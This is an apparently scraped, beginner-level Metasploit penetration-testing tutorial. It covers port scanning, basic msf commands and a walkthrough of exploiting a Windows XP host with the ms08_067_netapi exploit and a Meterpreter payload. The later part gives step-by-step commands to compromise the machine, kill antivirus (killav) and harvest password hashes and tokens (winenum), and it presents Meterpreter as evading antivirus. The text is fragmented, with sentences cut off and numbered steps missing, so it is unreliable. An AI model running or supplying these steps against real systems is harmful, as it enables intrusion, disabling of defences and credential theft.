Introduction Metasploit framework is a penetration testing framework that contain a lot of tools (port scanners, vulnerability scanners, exploits,…etc), now we will start with the important step in penetration testing. Information Gathering The first and the most imprtant step in penetration testing is information gathering, it is collecting as much information as possible about a target and your information must be accurate.
Information gathering is 2 types
1- Passive information Gathering: It’s collecting information wthout touching the target like using
Scanning ByModules Metasploit contains a lot of modules such as (port scanners, banner grabbers for services … etc), we will use here some of these modules
Note 1: To get port scanner modules msf> search portscan TCP-SYN scanning To make TCP-SYN port scan(syn), to use a module use use command
msf> useauxiliary/scanner/portscan/syn
Then to adjust this modules use show options, you will see many options and you can set any variable you want by set command, for example to set IP address of the target address set RHOST 192.
Advanced Commands Now we will introduce some advanced commands in metasploit
1- show exploits: Display all exploites available in metasploit
msf> show exploits
2- show auxiliary: Display all auxiliaries available in metasploit (scanners, fuzzers , DOS tools … etc)
msf> show auxiliary
3- show options: Display all the options available in specific exploit for example ms03_026_dcom exploit
msf> show options
4- show payloads: Display payloads that are related to the current module for example ms03_026_dcom
What is meterpreter? Meterpreter is payload that uses DLL injection technique in memory so, antiviruses software can’t detect it because meterpreter writes nothing to disk, meterpreter uses encrypted communications.
Now let’s try to hack windows machine (Windows XP) and set Meterpreter as a payload, first we will use ms08_067_netapi exploit
use exploit/windows/smb/ms08_067_netapi
Then we set the remote host (victim)
set RHOST 192.168.0.227
Then we set meterpreter as a payload
9- checkvm To check if the remote system is a Vitrual machine
run checkvm
The target system is actually a virtual machine ruuning on VMware
10- killav To kill antivirus
run killav
11- windows enumration: Collecting all information about the target machine such as (username, running process, tokens, network information, hardware information, groups, network route, firewall configuration, hash passwords,etc…)
run winenum
As mentioned the output is located in /root/.msf4/logs/scripts/winenum/BTRACK, to view the tokens